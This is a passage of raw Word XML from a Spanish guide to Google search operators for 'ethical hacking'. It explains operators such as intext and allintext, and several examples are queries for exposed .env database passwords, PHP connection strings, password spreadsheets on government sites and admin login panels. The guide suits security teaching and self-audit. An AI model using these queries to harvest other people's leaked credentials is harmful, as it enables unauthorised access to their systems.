    <w:p w14:paraId="7CF8EDDB" w14:textId="77777777" w:rsidR="006065ED" w:rsidRPr="006065ED" w:rsidRDefault="006065ED" w:rsidP="006065ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006065ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="006065ED">
        <w:t> Muestra sitios “relacionados” con </w:t>
      </w:r>
      <w:r w:rsidRPr="006065ED">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="006065ED">
        <w:t>, útil para descubrir competencia o dominios similares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46176E01" w14:textId="77777777" w:rsidR="00D90CC3" w:rsidRPr="00D90CC3" w:rsidRDefault="00D90CC3" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>allinanchor:términos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3F289" w14:textId="77777777" w:rsidR="00D90CC3" w:rsidRPr="00D90CC3" w:rsidRDefault="00D90CC3" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90CC3">
        <w:t> Restringe resultados a páginas que reciben enlaces (backlinks) cuyo texto contenga todos los términos indicados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC20E6" w14:textId="77777777" w:rsidR="00D90CC3" w:rsidRPr="00D90CC3" w:rsidRDefault="00D90CC3" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90CC3">
        <w:t> allinanchor:"database leaked"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E6FB10" w14:textId="77777777" w:rsidR="00D90CC3" w:rsidRDefault="00D90CC3" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90CC3">
        <w:t> Muestra páginas enlazadas con la frase “database leaked” en su anchor text, revelando brechas de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E17571" w14:textId="77777777" w:rsidR="00D90CC3" w:rsidRPr="00D90CC3" w:rsidRDefault="00D90CC3" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>inanchor:término</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E636C22" w14:textId="77777777" w:rsidR="00D90CC3" w:rsidRPr="00D90CC3" w:rsidRDefault="00D90CC3" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90CC3">
        <w:t> Similar a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allinanchor</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90CC3">
        <w:t>, pero se puede combinar con otros términos en la misma búsqueda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57382666" w14:textId="77777777" w:rsidR="00D90CC3" w:rsidRPr="00D90CC3" w:rsidRDefault="00D90CC3" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> inanchor:breach "credit cards"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025ECED" w14:textId="77777777" w:rsidR="00D90CC3" w:rsidRPr="00D90CC3" w:rsidRDefault="00D90CC3" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D90CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90CC3">
        <w:t> Encuentra páginas cuyo anchor text incluya “breach” y que mencionen “credit cards” en el contenido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F54B1" w14:textId="77777777" w:rsidR="00527DD4" w:rsidRPr="00527DD4" w:rsidRDefault="00527DD4" w:rsidP="00527DD4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00527DD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>allintext:términos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7230C62A" w14:textId="77777777" w:rsidR="00527DD4" w:rsidRPr="00527DD4" w:rsidRDefault="00527DD4" w:rsidP="00527DD4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00527DD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00527DD4">
        <w:t> Muestra solo páginas que contengan todos los términos en el texto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542F3E7B" w14:textId="77777777" w:rsidR="00527DD4" w:rsidRPr="00527DD4" w:rsidRDefault="00527DD4" w:rsidP="00527DD4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00527DD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00527DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> allintext:"internal use only confidential"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337CCD06" w14:textId="77777777" w:rsidR="00527DD4" w:rsidRPr="00527DD4" w:rsidRDefault="00527DD4" w:rsidP="00527DD4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00527DD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00527DD4">
        <w:t> Filtra resultados a aquellos que incluyan la frase exacta “internal use only confidential” en el cuerpo del texto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8410C4" w14:textId="77777777" w:rsidR="00D90CC3" w:rsidRDefault="00D90CC3" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA4461B" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00456081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>intext:término</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42223AC6" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00456081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00456081">
        <w:t> Busca páginas que incluyan un término en su texto. Puede combinarse con más palabras.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363583EA" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00456081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00456081">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> intext:exposed "api key"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E127483" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00456081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00456081">
        <w:t> Retorna páginas donde aparezca “exposed” en el texto y que incluyan la frase “api key”, útil para detectar posibles credenciales filtrada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456081" w14:paraId="31F91B2E" w14:textId="77777777" w:rsidTr="00456081">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FB803C6" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>allintext:términos vs intext:término</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="717581F1" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00B941CC" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="53CF2B6E">
                <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="4406F189" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>allintext:términos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="596CFFB1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Sintaxis:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="459A0ADB" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>allintext:admin password database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="419F606E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¿Qué hace?</w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:t xml:space="preserve"> Busca páginas donde </w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TODOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:t xml:space="preserve"> los términos aparecen en el </w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>texto del contenido</w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:t xml:space="preserve"> (no en URL, título o enlaces).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4332E1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Ejemplo:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F03B031" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>allintext:username password mysql</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B8B0218" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>Encuentra páginas cuyo contenido contiene las tres palabras: "username", "password" y "mysql".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EDC38B2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Limitación:</w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:t xml:space="preserve"> NO puedes combinar con otros operadores como site: o filetype:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7177E6BE" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00B941CC" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="4DC20CB4">
                <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FDBFE50" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>intext:término</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B7FD22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Sintaxis:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E76D26D" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>intext:password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F73679A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¿Qué hace?</w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:t xml:space="preserve"> Busca páginas que contengan el término en el </w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>texto del contenido</w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:t xml:space="preserve">. Puedes </w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>combinarlo</w:t>
            </w:r>
            <w:r w:rsidRPr="00456081">
              <w:t xml:space="preserve"> con otros operadores.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="095A6E24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Ejemplos combinados:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D4023D5" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="006D4D78" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>intext:password site:gov filetype:xls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50AB8A87" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>intext:admin inurl:login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FEE4976" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>intext:database ext:sql</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53852DB3" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00B941CC" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="286E24E4">
                <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="37371334" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Diferencia clave:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56E8904D" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>allintext:admin password login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F4AEB8" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>→ Las 3 palabras DEBEN estar en el texto</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FDF8D07" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>→ NO puedes usar site:, filetype:, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E322A9E" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1599F0F4" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>intext:admin password login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DBD765D" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>→ Solo "admin" garantizado en texto</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7872B0B0" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>→ "password login" se buscan normalmente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F14726" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>→ SÍ puedes combinar: intext:admin site:ejemplo.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D435658" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00B941CC" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="248A0DF4">
                <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B544A21" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Uso en hacking ético:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BACBDDC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Buscar archivos de configuración expuestos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CFC9416" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>intext:"DB_PASSWORD" filetype:env</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C9F0DF" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>intext:"mysql_connect" filetype:php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E2A95E5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Encontrar credenciales en logs:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C547D7" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>allintext:username password failed login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6561A7D2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Buscar paneles admin:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E6FFD47" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>intext:"admin panel" inurl:login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59548367" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00B941CC" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="5F461C49">
                <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A41F4F1" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081" w:rsidP="00456081">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Resumen:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5E71F4" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>allintext: = todos los términos en el texto, sin otros operadores</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15468485" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00456081" w:rsidRDefault="00456081">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00456081">
              <w:t>intext: = un término en el texto, combinable con otros comandos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25E3DF45" w14:textId="77777777" w:rsidR="00456081" w:rsidRDefault="00456081" w:rsidP="00D90CC3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="377A5AB9" w14:textId="77777777" w:rsidR="00456081" w:rsidRPr="00D90CC3" w:rsidRDefault="00456081" w:rsidP="00D90CC3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19035B73" w14:textId="77777777" w:rsidR="008B367D" w:rsidRDefault="008B367D" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDE7B6E" w14:textId="77777777" w:rsidR="00C35C7D" w:rsidRPr="00C35C7D" w:rsidRDefault="00C35C7D" w:rsidP="00C35C7D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>allinurl:términos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5831EA6D" w14:textId="77777777" w:rsidR="00C35C7D" w:rsidRPr="00C35C7D" w:rsidRDefault="00C35C7D" w:rsidP="00C35C7D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C7D">
        <w:t> Muestra solo resultados que tengan todos los términos en la URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB2BAC" w14:textId="77777777" w:rsidR="00C35C7D" w:rsidRPr="00C35C7D" w:rsidRDefault="00C35C7D" w:rsidP="00C35C7D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C7D">
        <w:t> allinurl:"admin portal"</w:t>
      </w:r>
    </w:p>
